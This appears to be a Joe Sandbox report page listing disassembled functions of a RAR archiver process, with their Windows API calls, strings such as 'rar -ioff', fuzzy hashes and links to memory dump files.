Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e1b03181f3cae9d3374a5f7fc6b0b71652811f921d99ec40cf27a6603eb5490
Instruction ID: 9da893b59a206ccfda00ba15784e06dab31c6d3ff43f2058f38206ad3631c946
Opcode Fuzzy Hash: 2e1b03181f3cae9d3374a5f7fc6b0b71652811f921d99ec40cf27a6603eb5490
Instruction Fuzzy Hash: B5514773518BD195EB109F24A8442ED37A8FB44F98F18423AEB884B79ADF395452C331

Function 00007FF62571231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF625712344

Part of subcall function 00007FF6257124D4: GetModuleHandleExW.KERNEL32 ref: 00007FF6257124F4
Part of subcall function 00007FF6257124D4: GetProcAddress.KERNEL32 ref: 00007FF62571250A
Part of subcall function 00007FF6257124D4: FreeLibrary.KERNEL32 ref: 00007FF62571252F

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 3f0ce15325e584065e665e72c56a3410a587f1e0e0cdbfbd2969486dd3d36c94
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 27417121E8964386FF789F169C6127922A1BFA0F40F548439DD0DCBA95DF3DEC458B42

Function 00007FF6256C4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF6256C4D47

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: 75afc00c24c4dcf63fad5585fe4b869e1a9283f6b3093a509684ea9b837586f5
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: 4201651160D54245EE24FF1668041B95660BF45F97F481435EE4D87BB9DF3DE8419312

Function 00007FF6256FA924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF6256FA998

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: ab135be366ce72a24ccf1d92a7ccc958791644b000da6447a37ff794348e2301
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: 89018661B2C69246EE206F17A81406EE651BB99FC0F5C8834EF8DCBB6ECE3DD4424705

Function 00007FF625714B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: cb4fc623fdd86d526c52a7b22173afd5d01b3f3382a07ea05d2d1b307833d93d
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 44014F54A9C64340FE749F665F6477A11925F84FE4F58C230ED1DC62D6ED2DEC014207

Function 00007FF6256D4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF6256D4590

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction ID: 79c62aa1ece9d94ba613c462a6613621c02ac1c9065e001f1363bcdcf82de76c
Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction Fuzzy Hash: AEF0D621A092C142DE249F7199012F82310BB06FF5F1C8334DEBC8B6E7CE9C98849722

Function 00007FF625714AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF625714AF2

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: 48385ddbfb25cc6d905491c92eab42c69c6e0fc90e771baafb93c851d8a1e09b
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 86F0F821ADD24241FE786EA25D6137922965F44FA0F498A35ED2EC63C1EE6CEC418226

Function 00007FF6256E38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: 4b116ccd01572c761204ee6f78bf3df0802b6b360c8c83ddee050a3d05a361ed
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 00E04F50F2A30240EDB82E331C5187E02402F5AF81E585439CD1ECA7A2DD1EBC557612

Function 00007FF62571FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF62571FA20

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: 0a3f6891ebdde02d586bb169759022bf9d39fcd0f694f0bbf50979ed4f708fa6
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: 39D05E65EAA90682FF25CF41EC4433012617F14F9BF814638C84C84550CFAC28458302

Function 00007FF6256D4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D4549

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 7353014faf2b3fa6bc2e47802be187974ae897cef2e27eda75226c8549296ad0
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: 32C02B25E0248180DD285B2DCC450341110BF48F76FE00330C13D859F0CF980CFB0302

Function 00007FF6256D1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF6256D1958

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: 4a936839add6040930e5dc509508c15e6765f6da63f8de85685bb1b1dbf35507
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: CEF0A432A0964645FF348F64E8403742650EB04F78F685334D63D890E9CFB8DC92D792

Non-executed Functions

Function 00007FF6256FB57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6256FB593
OpenProcessToken.ADVAPI32 ref: 00007FF6256FB5A6
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6256FB5BE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6256FB5EF
ExitWindowsEx.USER32 ref: 00007FF6256FB602
ExitWindowsEx.USER32 ref: 00007FF6256FB637

Strings

SeShutdownPrivilege, xrefs: 00007FF6256FB5B7

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3729174658-3733053543
Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction ID: 5c67f78dfdaa1b0465f81fe805e6cc29e405f6ddbd3e383df4daaa908faa4524
Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
Instruction Fuzzy Hash: AA218132E5864282FFB08F20EC5537A73A1FB85B44F505035E94EC6968DF3DD8498712

Function 00007FF6257186D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF625718704

Part of subcall function 00007FF625714E3C: GetCurrentProcess.KERNEL32(00007FF625719CC5), ref: 00007FF625714E69

Strings

., xrefs: 00007FF625718B24
*?, xrefs: 00007FF62571872B

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CurrentProcess_invalid_parameter_noinfo
String ID: *?$.
API String ID: 2518042432-3972193922
Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction ID: def0261e6f983c43734b634c0aff1df46f11a644f9d4b699b7606f66d53e1b91
Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
Instruction Fuzzy Hash: B951D162F64A9585EF20DFA29C205AC67A5FB48FE8B448531DE1D97B85DF3CD8418301

Function 00007FF6256D1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF6256D1694
GetShortPathNameW.KERNEL32 ref: 00007FF6256D16B5

Part of subcall function 00007FF6256FDAC0: CompareStringW.KERNEL32(?,?,?,?,?,?,00007FF6256E4C1E,?,?,?,?,?,?,?,00007FF625709706), ref: 00007FF6256FDADF

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6256D175F
MoveFileW.KERNEL32 ref: 00007FF6256D17CD
MoveFileW.KERNEL32 ref: 00007FF6256D1815

Strings

rtmp%d, xrefs: 00007FF6256D1755

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortStringswprintf
String ID: rtmp%d
API String ID: 2308737092-3303766350
Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction ID: b89712d8ae7eb83aa0b9c38a4decbaf0313f66ca55c9e46cc28e27841c8a23ea
Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
Instruction Fuzzy Hash: 19519122A1968645EE70EF21DC445FE2351BF48F84F650431DD0ECBAAADE7CEA05E302

Function 00007FF6256FB650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 00007FF6256FB66A
CloseHandle.KERNEL32 ref: 00007FF6256FB685
CreateEventW.KERNEL32 ref: 00007FF6256FB699
GetLastError.KERNEL32 ref: 00007FF6256FB6A6
CloseHandle.KERNEL32 ref: 00007FF6256FB6C0

Strings

rar -ioff, xrefs: 00007FF6256FB65C, 00007FF6256FB68B

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

